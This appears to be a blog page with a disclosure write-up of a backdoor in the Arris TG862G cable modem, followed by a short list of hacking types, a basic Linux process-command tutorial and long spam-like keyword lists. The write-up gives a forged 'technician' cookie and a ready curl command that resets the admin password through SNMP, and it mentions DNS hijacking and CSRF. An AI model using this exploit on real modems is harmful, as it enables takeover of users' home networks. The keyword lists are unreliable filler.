Wednesday, May 31, 2023

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Continue reading


  1. Hack Tools For Pc
  2. Hacker Security Tools
  3. Kik Hack Tools
  4. Pentest Tools Kali Linux
  5. Hacking Tools Free Download
  6. Hacking Apps
  7. Hack Tool Apk
  8. Pentest Tools Bluekeep
  9. Hacker Tools
  10. Hack Tool Apk No Root
  11. Hacking Tools For Windows 7
  12. Hacker Tools 2020
  13. Hacking App
  14. Pentest Recon Tools
  15. Hacker Hardware Tools
  16. Hack Tools For Mac
  17. Hack Tools For Pc
  18. Pentest Tools Url Fuzzer
  19. Hacker Search Tools
  20. Hacker
  21. Hackrf Tools
  22. Hacking Tools Kit
  23. Hacker Tools For Mac
  24. Hack Tools For Pc
  25. Pentest Tools Alternative
  26. Hack Tools For Ubuntu
  27. Pentest Tools Review
  28. Computer Hacker
  29. Hack Tools For Mac
  30. Hack Website Online Tool
  31. Hack Tools Pc
  32. Pentest Box Tools Download
  33. Black Hat Hacker Tools
  34. Hacker Tools For Windows
  35. Pentest Tools Website Vulnerability
  36. Hack Tools Pc
  37. Hacking Tools Download
  38. Hacking Tools Github
  39. Hackers Toolbox
  40. Hacking Tools And Software
  41. Hack Tools For Games
  42. Pentest Tools Nmap
  43. Pentest Tools Website
  44. Pentest Tools Website
  45. Pentest Tools Online
  46. Hacking Tools Name
  47. Hacking Tools Kit
  48. Hacking Tools For Beginners
  49. Hack Tools For Games
  50. Hacking Tools For Beginners
  51. Bluetooth Hacking Tools Kali
  52. What Are Hacking Tools
  53. Hack Tools For Windows
  54. Pentest Tools Download
  55. Termux Hacking Tools 2019
  56. Tools Used For Hacking
  57. Underground Hacker Sites
  58. New Hack Tools
  59. Pentest Tools Download
  60. Pentest Tools Find Subdomains
  61. Pentest Tools Tcp Port Scanner
  62. Pentest Tools Find Subdomains
  63. Hacker Techniques Tools And Incident Handling
  64. What Are Hacking Tools
  65. Pentest Tools Online
  66. Hacking App
  67. Tools Used For Hacking
  68. Hacking Tools Software
  69. What Is Hacking Tools
  70. Pentest Tools Android
  71. Hacking Tools For Games
  72. World No 1 Hacker Software
  73. Pentest Automation Tools
  74. Hak5 Tools
  75. Black Hat Hacker Tools
  76. Hack Apps
  77. Hacker Tools Github
  78. Ethical Hacker Tools
  79. Hacker Tools 2019
  80. Pentest Tools For Ubuntu
  81. Hacking Tools Windows
  82. Android Hack Tools Github
  83. Pentest Tools Url Fuzzer
  84. Hacker Tools Apk
  85. Hacking Tools For Windows Free Download
  86. Hacks And Tools
  87. Hacking Tools For Beginners
  88. Pentest Reporting Tools
  89. Nsa Hack Tools Download
  90. World No 1 Hacker Software
  91. Pentest Tools Android
  92. Best Hacking Tools 2019
  93. Hacker Search Tools
  94. Bluetooth Hacking Tools Kali
  95. Pentest Box Tools Download
  96. Hack Tools For Mac
  97. Pentest Tools Bluekeep
  98. How To Hack
  99. Pentest Tools Open Source
  100. Hacking Tools Hardware
  101. Hack Tool Apk
  102. Pentest Tools Find Subdomains
  103. Install Pentest Tools Ubuntu
  104. Pentest Tools Online
  105. Hack And Tools
  106. Hacking Tools 2019
  107. Pentest Tools Windows
  108. Pentest Automation Tools
  109. Beginner Hacker Tools
  110. Hack Website Online Tool
  111. Wifi Hacker Tools For Windows
  112. Hack Tool Apk
  113. Hacking Tools Online
  114. Pentest Tools Kali Linux
  115. Pentest Tools Nmap
  116. Hacking Tools Windows
  117. Beginner Hacker Tools
  118. Hacking Tools Online
  119. Android Hack Tools Github
  120. Hacking Tools For Games
  121. Hack Tools Download
  122. Hack Tools 2019
  123. Hack Rom Tools
  124. Best Hacking Tools 2019
  125. Hack Tools
  126. Hacker Tools For Windows
  127. Hacking Tools For Beginners
  128. Hack App
  129. Pentest Tools Download
  130. Pentest Tools For Android
  131. Pentest Tools Free
  132. Hacking Tools And Software
  133. How To Hack
  134. Pentest Tools Website Vulnerability
  135. Usb Pentest Tools
  136. Pentest Tools Tcp Port Scanner
  137. Hack Tools 2019
  138. Hacker Tools Hardware
  139. Nsa Hack Tools
  140. Hacking Tools Free Download
  141. Pentest Tools For Android
  142. Nsa Hacker Tools
  143. Hacker Tools 2019
  144. Black Hat Hacker Tools
  145. Hacker Tools For Windows
  146. Hacker Tools Mac
  147. Hacker Tools 2019
  148. Hack Tools 2019
  149. Hacker Tools Online
  150. Hacking App
  151. Hack Tools 2019
  152. Pentest Tools Open Source
  153. Pentest Tools Android
  154. Pentest Tools Url Fuzzer
  155. Wifi Hacker Tools For Windows
  156. Hack Tools 2019
  157. Hacking Tools Download
  158. Hacker Security Tools
  159. Hacking Tools For Games
  160. New Hack Tools
  161. Hack App
  162. Free Pentest Tools For Windows
  163. Hacking Tools And Software
  164. Hack Tools Online
  165. Nsa Hack Tools
  166. Nsa Hack Tools
  167. Pentest Tools Linux
  168. Pentest Tools For Windows
  169. Pentest Tools
  170. Blackhat Hacker Tools
  171. Best Hacking Tools 2019
  172. Pentest Tools Website Vulnerability
  173. Hacker Tools List
  174. Pentest Recon Tools
  175. Hacker Security Tools

TYPES OF HACKING

Types of hacking?
We can segregate hacking into different categories, based on what being hacked. Here is a set of examples-

1-Website Hacking- Hacking a website means taking unauthorized control over a web server and its associated software such as databases and other interfaces.

2-Network Hacking-Hacking a network means gathering information about a network by using tool like Telnet, Nslookup, Ping, Tracert, Netstat etc with the intent to harm the network system and hamper its operation.

3-Email Hacking-It includes getting unauthorized access on an Email account and using it without taking the permission of the owner.

4-Ethical Hacking-It involves finding weakness in a computer or network system for testing purpose and finally getting them fixed.

5-Password Hacking-This is the process of recovering secret password from data that has been stored in or transmitted by a computer system.

6-Computer Hacking-This is the process of stealing computer ID & Passwords by applying hacking methods and getting unauthorized access to a computer system.

Related posts


Tuesday, May 30, 2023

Linux Command Line Hackery Series - Part 5



Welcome back to the Linux Command Line Hackery series, this is Part-V of the series. Today we are going to learn how to monitor and control processes on our Linux box, so wrap your sleeves up and let's get started.

Command:    ps
Syntax:           ps [options]
Description:  ps displays information about the currently running processes. Some of the common flags of ps are described briefly below
Flags: 
  -A or -e -> select all processes
  -a -> select all processes except both session leaders and processes not associated with a terminal.
  T -> select all processes associated with current terminal
  -u <username or id> -> select all processes of a given user or userlist

Open up a terminal and type ps:

ps

what you'll see is a list of processes currently running in your terminal. One important thing to notice in the output is what's called as PID which stands for process ID. It is the number that uniquely identifies a process. Just keep that PID concept in mind we'll use it soon.

OK I know that's not really what you want to see rather you want to see all the processes that are currently running on your box. Don't worry we have flags to rescue, in order to see all the processes you can use the -e flag like this:

ps -e

Boom! you get a long list of processes currently running on your machine (don't stare at me like that, you asked and I gave you that). If you want to see processes of a particular user you can type the following command in your terminal:

ps -u bob

here "bob" is a username. This command will list all processes of the user with effective user name of bob.

You can do a full-format listing of the processes using the -f flag like this:

ps -fu bob

But the output of the ps command is a snapshot not really a live preview of what is going on in your box. I know your next question is going to be something like this, Isn't there a command in Linux that gives me a live updating information of the processes? Yes, there is a command called top that we'll learn about next.

Command:    top
Syntax:           top [options]
Description:  top gives a dynamic real-time view of a running system. That is, it gives the up-to-date information about all the processes running on your Linux box (sounds fun!). Besides giving information about current processes and threads top also provides a brief system summary.

To start top just type this command:

top

and you'll get a nice and cute looking ugly display :). Well what the heck is going on here you might ask, right? What you get is information about what is going on with your computer. To see what more can you do with top just type <h> within the program window and you'll be given list of options that you can play with.

OK looking at what processes are going on in your box is cool but what if you want to terminate (or close) a process, is there a command line utility for that? Yes, there is and that's what we are going to look at next.

Command:   kill
Syntax:          kill [options] <pid> [...]
Description:  kill is used to send a signal to process which by default is a TERM signal meaning kill by default sends a signal of termination to process (Cruel guy). To list the available signals we can use the -l or -L flag of the kill command.


To simply terminate a process we provide kill command a PID (process ID) and it will send the TERM signal to the process. So to kill a process first we'll list the running processes and then we'll keep the PID of the process in mind that we want to terminate. After that we'll issue the kill command with the PID that we just found.

ps -ax
kill 1153

the above command will send a TERM signal to the process whose PID is 1153, as simple as that.

We can also use our already learned skills to refine the output of ps command. Say we have a xterm terminal running on our box and we want to terminate it. By using ps command all alone we'll get a long listing of all processes running on our box. But we can limit the output of ps command to just those processes that we're interested in by piping ps command with the grep command like this:

ps -ax | grep xterm

wow! that's amazing, we're able to pull out only those results from the ps command that contained xterm in them. Isn't that a cool trick? But what is that vertical bar ( ) doing in the middle, you may be thinking, right? Remember we learned about the input and output re-directors previously, the vertical bar (pipe in geeky terms) is another re-director whose task is to redirect the output of one command as input to another command. Here the pipe redirects the output of ps -ax command as input to grep command and of-course from the previous article you know that grep is used to search for a PATTERN in the given input. That means the above command searches for the xterm word in the output of ps -ax command and then displays just those lines of ps -ax command which contain xterm. Now get that PID and kill that process.

That's it for today, try these commands up on your own box and remember practice is gonna make you master the Linux command line. :)

Read more
  1. Kik Hack Tools
  2. Hacker Tools For Ios
  3. Hacking Tools For Mac
  4. Hacking Tools Software
  5. Hacking Tools Download
  6. Pentest Tools Kali Linux
  7. Hacking Tools Kit
  8. Hacker Tools List
  9. Hacking Tools Free Download
  10. Hackers Toolbox
  11. Tools For Hacker
  12. Blackhat Hacker Tools
  13. Hacker Tool Kit
  14. Hacker Tools Online
  15. Hacker Tool Kit
  16. Hacking Tools For Beginners
  17. Hacker Security Tools
  18. Pentest Tools Github
  19. Best Hacking Tools 2019
  20. Hacker Tools 2019
  21. Hackers Toolbox
  22. Hacking Apps
  23. Pentest Tools Port Scanner
  24. Ethical Hacker Tools
  25. Tools Used For Hacking
  26. Hacking Tools Download
  27. Pentest Tools Alternative
  28. Tools 4 Hack
  29. Pentest Tools Free
  30. Hacking App
  31. Growth Hacker Tools
  32. Hacker Search Tools
  33. Hack Tools Online
  34. Black Hat Hacker Tools
  35. Pentest Reporting Tools
  36. Hacker Tools 2020
  37. Hack Tools Pc
  38. Pentest Tools Kali Linux
  39. Hack Rom Tools
  40. Hacking Tools Pc
  41. Hacking Apps
  42. Hacking Tools Online
  43. Kik Hack Tools
  44. Easy Hack Tools
  45. Github Hacking Tools
  46. Wifi Hacker Tools For Windows
  47. Hacking Tools Windows 10
  48. Hacking Tools
  49. Android Hack Tools Github
  50. Tools For Hacker
  51. Hacker Hardware Tools
  52. Wifi Hacker Tools For Windows
  53. Hacker Tools
  54. Hacker Tools Apk
  55. Hack Tool Apk
  56. Pentest Tools Kali Linux
  57. Hacking App
  58. Hackers Toolbox
  59. Hacking Tools For Games
  60. Underground Hacker Sites
  61. Hacking Tools For Games
  62. Hacker Tools Mac
  63. Top Pentest Tools
  64. Hacker Tools Online
  65. Hacking Tools For Windows 7
  66. Hack Tools For Ubuntu
  67. Hack Rom Tools
  68. Hacker Tools Software
  69. Hacker Tools 2019
  70. Hacking Tools Kit
  71. Free Pentest Tools For Windows
  72. Pentest Tools Open Source
  73. Nsa Hack Tools
  74. Pentest Tools Website Vulnerability
  75. Hack Tools For Pc
  76. Hacker Tools For Windows
  77. Hacking Tools 2020